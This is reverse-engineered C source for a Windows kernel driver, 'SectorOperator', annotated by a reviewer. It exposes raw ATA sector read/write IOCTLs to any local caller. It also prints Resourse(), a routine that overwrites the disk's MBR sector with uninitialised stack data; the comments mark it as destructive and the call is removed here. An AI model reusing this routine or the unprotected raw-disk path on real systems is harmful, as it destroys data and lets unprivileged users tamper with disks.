/*++
Project name: SectorOperator - Reverse from SectorOperator.sys
File name : SectorOperator.c
Reversed by : prince
Date : 02/06/2007
Web site : http://www.unpack.cn
http://www.arswp.com
http://www.pediy.com
http://www.debugman.com
http://www.driverdevolop.com
Mail : Cracker_prince@163.com
Description : This code was reversed from SectorOperator.sys.
--*/
/*
* Include files
*/
#include <ntddk.h>
#include "HardWare.h"
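//
// Forward declaration; the definition is at the end of this file.
// `(void)` gives it a real prototype -- the original `()` declared an
// unspecified argument list, which the compiler cannot check calls against.
//
void Resourse(void);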
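NTSTATUS
DriverEntry(
    IN PDRIVER_OBJECT DriverObject,
    IN PUNICODE_STRING RegistryPath
    )
/*++
Routine Description:
    Driver initialisation.  Installs the dispatch routines, creates the
    control device \Device\devSectorOperator and the user-visible link
    \DosDevices\slSectorOperator that points at it.

Arguments:
    DriverObject - the driver object supplied by the I/O manager.
    RegistryPath - the driver's service key; unused.

Return Value:
    STATUS_SUCCESS, or the failure status of IoCreateDevice /
    IoCreateSymbolicLink.  If the symbolic link cannot be created the device
    object is deleted again before returning.
--*/
{
    NTSTATUS status;
    PDEVICE_OBJECT pDeviceObject = NULL;
    UNICODE_STRING DeviceName;
    UNICODE_STRING SymbolicLinkName;

    UNREFERENCED_PARAMETER(RegistryPath);

    DriverObject->MajorFunction[IRP_MJ_CREATE] = SectorOperatorComplete;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] = SectorOperatorComplete;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = SectorOperatorDispatchControl;
    DriverObject->DriverUnload = SectorOperatorUnload;

    RtlInitUnicodeString(&DeviceName, L"\\Device\\devSectorOperator");

    //
    // NOTE(review): IoCreateDevice applies the default device security
    // descriptor, so every local caller that can open the symbolic link
    // below reaches the raw-sector IOCTLs in SectorOperatorDispatchControl.
    // A device like this needs an explicit restrictive SDDL string
    // (IoCreateDeviceSecure) if it is meant for administrators only.
    //
    status = IoCreateDevice(DriverObject,
                            0,
                            &DeviceName,
                            FILE_DEVICE_UNKNOWN,
                            0,
                            FALSE,
                            &pDeviceObject);
    if (!NT_SUCCESS(status))
    {
        return status;
    }

    RtlInitUnicodeString(&SymbolicLinkName, L"\\DosDevices\\slSectorOperator");
    status = IoCreateSymbolicLink(&SymbolicLinkName, &DeviceName);
    if (!NT_SUCCESS(status))
    {
        IoDeleteDevice(pDeviceObject);
        return status;
    }

    //
    // The original binary called Resourse() at this point, unconditionally
    // and before the symbolic-link status was checked.  Resourse() streams
    // an uninitialised 512-byte stack array to sector 1 (cylinder 0, head 0)
    // of the primary master ATA disk -- see its definition at the end of this
    // file -- which corrupts on-disk data on every driver load.  It is not
    // part of device initialisation, so the call is not made here.
    //
    return STATUS_SUCCESS;
}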
NTSTATUS
SectorOperatorComplete(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp
    )
/*++
Routine Description:
    Shared handler for IRP_MJ_CREATE and IRP_MJ_CLOSE.  Every open and close
    of the control device is accepted; no per-handle state is kept, so any
    caller that can open the symbolic link obtains a handle that reaches the
    device-control path.

Arguments:
    DeviceObject - unused.
    Irp - the create/close IRP; it is completed here with STATUS_SUCCESS.
          IoStatus.Information is left untouched.

Return Value:
    STATUS_SUCCESS.
--*/
{
    UNREFERENCED_PARAMETER(DeviceObject);

    Irp->IoStatus.Status = STATUS_SUCCESS;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);

    return STATUS_SUCCESS;
}
VOID
SectorOperatorUnload(
    IN PDRIVER_OBJECT DriverObject
    )
/*++
Routine Description:
    Driver unload.  Removes the \DosDevices\slSectorOperator link and then
    the device object hanging off the driver object.  The result of the link
    deletion is not examined; unload has no way to report failure.

Arguments:
    DriverObject - the driver object whose single device is torn down.
--*/
{
    UNICODE_STRING linkName;

    RtlInitUnicodeString(&linkName, L"\\DosDevices\\slSectorOperator");
    (VOID)IoDeleteSymbolicLink(&linkName);
    IoDeleteDevice(DriverObject->DeviceObject);
}
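NTSTATUS
SectorOperatorDispatchControl(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp
    )
/*++
Routine Description:
    IRP_MJ_DEVICE_CONTROL handler.  Two IOCTLs are served; both drive the
    legacy primary ATA channel (ports 0x1f0-0x1f7) directly with port I/O,
    bypassing the storage stack, disk filters and the cache manager.

    IO_CONTROL_CODE_WRITE_SECTOR
        Input  514 bytes: [0] sector number, [1] drive (0 = master, any other
               value = slave), [2..513] the 512 bytes to write.
        Output 0 bytes.
    IO_CONTROL_CODE_READ_SECTOR
        Input  2 bytes: [0] sector number, [1] drive as above.
        Output 512 bytes: the sector contents.

    Only cylinder 0 / head 0 is addressable: the cylinder registers are
    written as 0 and the drive/head byte (0xa0 / 0xb0) carries no head bits.
    The caller's sector byte is handed to the controller unchecked.

Arguments:
    DeviceObject - unused.
    Irp - the device-control IRP.  The request buffer is taken from
          Irp->AssociatedIrp.SystemBuffer, which assumes both IOCTL codes are
          METHOD_BUFFERED (they are defined in HardWare.h, not visible here --
          confirm; with any other transfer method SystemBuffer is the wrong
          pointer).

Return Value:
    STATUS_SUCCESS after a transfer, STATUS_INVALID_DEVICE_REQUEST for an
    unknown control code or for buffer lengths other than the ones above.
    The IRP is always completed here; IoStatus.Information is 512 for a
    successful read and 0 otherwise.

Remarks (review):
    - The DRQ polling loops (Loop1 / Loop2) spin without a timeout and never
      look at BSY (bit 7) or ERR (bit 0), so a missing or failing device
      hangs the calling thread.
    - Each data transfer runs under cli/sti; the trailing sti re-enables
      interrupts unconditionally.
    - The device is created with the default security descriptor in
      DriverEntry, so this raw-disk path is reachable by any local caller
      that can open the symbolic link.
--*/
{
    PIO_STACK_LOCATION IrpStack = IoGetCurrentIrpStackLocation(Irp);
    ULONG dwControlCode = IrpStack->Parameters.DeviceIoControl.IoControlCode;
    ULONG dwInputBufferLength = IrpStack->Parameters.DeviceIoControl.InputBufferLength;
    ULONG dwOutputBufferLength = IrpStack->Parameters.DeviceIoControl.OutputBufferLength;
    PVOID pUserBuffer = Irp->AssociatedIrp.SystemBuffer;
    NTSTATUS status = STATUS_INVALID_DEVICE_REQUEST;
    ULONG_PTR information = 0;   // bytes returned to the caller; 0 unless a read succeeds

    //
    // Bytes handed to the controller.  UCHAR rather than CHAR: 0xa0 / 0xb0
    // do not fit a signed char, and the asm below moves the raw byte into AL.
    //
    UCHAR byteDiskInfoWrite;
    UCHAR byteSectorNumberWrite;
    UCHAR byteDiskInfoRead;
    UCHAR byteSectorNumberRead;
    CHAR chWriteBuffer[512];   // staging copy streamed out with rep outsw
    CHAR chReadBuffer[512];    // filled by rep insw, then copied to the caller

    UNREFERENCED_PARAMETER(DeviceObject);

    if (dwControlCode == IO_CONTROL_CODE_WRITE_SECTOR)
    {
        // Exactly two header bytes plus one 512-byte sector, nothing back.
        if (dwInputBufferLength == 514 && dwOutputBufferLength == 0)
        {
            const UCHAR *pIn = (const UCHAR *)pUserBuffer;

            byteSectorNumberWrite = pIn[0];
            byteDiskInfoWrite = (pIn[1] == 0) ? 0xa0 : 0xb0;   // master : slave
            memcpy(chWriteBuffer, pIn + 2, 512);

            __asm
            {
                mov dx, 0x1f6
                mov al, byteDiskInfoWrite       ; drive/head register: drive select, CHS, head 0
                out dx, al
                mov dx, 0x1f2
                mov al, 1                       ; sector count = 1
                out dx, al
                mov dx, 0x1f3
                mov al, byteSectorNumberWrite   ; sector number, caller supplied
                out dx, al
                mov dx, 0x1f4
                mov al, 0                       ; cylinder low = 0
                out dx, al
                mov dx, 0x1f5
                out dx, al                      ; cylinder high = 0 (AL still 0)
                mov dx, 0x1f7
                mov al, 0x30                    ; WRITE SECTORS command
                out dx, al
            Loop1:
                in al, dx                       ; status register
                test al, 8                      ; DRQ?
                jz Loop1                        ; no timeout; BSY / ERR never examined
                xor ecx, ecx
                mov cx, 0x100                   ; 256 words = 512 bytes
                lea esi, chWriteBuffer
                mov dx, 0x1f0                   ; data register
                cli
                cld
                rep outsw
                sti
            }

            status = STATUS_SUCCESS;
            information = 0;
        }
    }
    else if (dwControlCode == IO_CONTROL_CODE_READ_SECTOR)
    {
        // Two header bytes in, one 512-byte sector out.
        if (dwInputBufferLength == 2 && dwOutputBufferLength == 512)
        {
            const UCHAR *pIn = (const UCHAR *)pUserBuffer;

            byteSectorNumberRead = pIn[0];
            byteDiskInfoRead = (pIn[1] == 0) ? 0xa0 : 0xb0;     // master : slave

            __asm
            {
                mov al, byteDiskInfoRead        ; drive/head register: drive select, CHS, head 0
                mov dx, 0x1f6
                out dx, al
                mov al, 1                       ; sector count = 1
                mov dx, 0x1f2
                out dx, al
                mov al, byteSectorNumberRead    ; sector number, caller supplied
                mov dx, 0x1f3
                out dx, al
                xor al, al                      ; cylinder low = 0
                mov dx, 0x1f4
                out dx, al
                mov dx, 0x1f5
                out dx, al                      ; cylinder high = 0 (AL still 0)
                mov al, 0x20                    ; READ SECTORS command
                mov dx, 0x1f7
                out dx, al
            Loop2:
                in al, dx                       ; status register
                test al, 8                      ; DRQ?
                jz Loop2                        ; no timeout; BSY / ERR never examined
                xor ecx, ecx
                mov cx, 0x100                   ; 256 words = 512 bytes
                mov dx, 0x1f0                   ; data register
                lea edi, chReadBuffer
                cli
                cld
                rep insw
                sti
            }

            // SystemBuffer doubles as the output buffer for buffered I/O.
            memcpy(pUserBuffer, chReadBuffer, 512);
            status = STATUS_SUCCESS;
            information = 512;
        }
    }

    // Information is set on every path so the I/O manager never copies a
    // stale byte count back on failure.
    Irp->IoStatus.Information = information;
    Irp->IoStatus.Status = status;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;
}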
/*++
Routine Description:
    Called once from DriverEntry.  Despite its name it allocates nothing: it
    issues a single ATA WRITE SECTORS command (0x30) to the primary master
    (drive-select 0xa0, sector 1, cylinder 0, head 0) and streams
    chWriteBuffer -- a 512-byte stack array that nothing ever initialises --
    to the device.  CHS 0/0/1 is the first sector of the disk, i.e. where the
    MBR lives, so every driver load overwrites it with whatever happened to
    be on the kernel stack.  Treat this as destructive behaviour; it is the
    on-disk effect an incident responder should expect when this driver has
    been loaded on a host.

    The first __asm block loads AX=0201h, DX=0080h, CX=0001h and BX with the
    buffer address -- the register set of a BIOS INT 13h read-sector call --
    but no interrupt is raised, so it only clobbers those registers.
    `lea bx, chWriteBuffer` also keeps just the low 16 bits of a 32-bit
    address.  NOTE(review): this looks like a leftover from a real-mode
    variant of the routine; confirm against the binary.

    As in SectorOperatorDispatchControl, the DRQ poll (Loop1) has no timeout
    and ignores BSY / ERR, and the data transfer runs under cli/sti.
--*/
void Resourse()
{
    CHAR chWriteBuffer[512];    // never written before being sent to the disk
    __asm{
        mov ax,0201h            ; INT 13h AH=02h (read), AL=1 sector -- never invoked
        mov dx,0080h            ; DL=80h first hard disk
        mov cx,0001h            ; cylinder 0, sector 1
        lea bx,chWriteBuffer    ; 16-bit lea of a 32-bit address
    }
    __asm
    {
        mov dx, 0x1f6
        mov al, 0a0h            ; drive/head register: primary master, CHS, head 0
        out dx, al
        mov dx, 0x1f2
        mov al, 1               ; sector count = 1
        out dx, al
        mov dx, 0x1f3
        mov al, 1               ; sector number = 1
        out dx, al
        mov dx, 0x1f4
        mov al, 0               ; cylinder low = 0
        out dx, al
        mov dx, 0x1f5
        out dx, al              ; cylinder high = 0 (AL still 0)
        mov dx, 0x1f7
        mov al, 0x30            ; WRITE SECTORS command
        out dx, al
    Loop1:
        in al, dx               ; status register
        test al, 8              ; DRQ?
        jz Loop1                ; no timeout; BSY / ERR never examined
        xor ecx, ecx
        mov cx, 0x100           ; 256 words = 512 bytes
        lea esi, chWriteBuffer  ; uninitialised stack contents go out here
        mov dx, 0x1f0           ; data register
        cli
        cld
        rep outsw
        sti
    }
}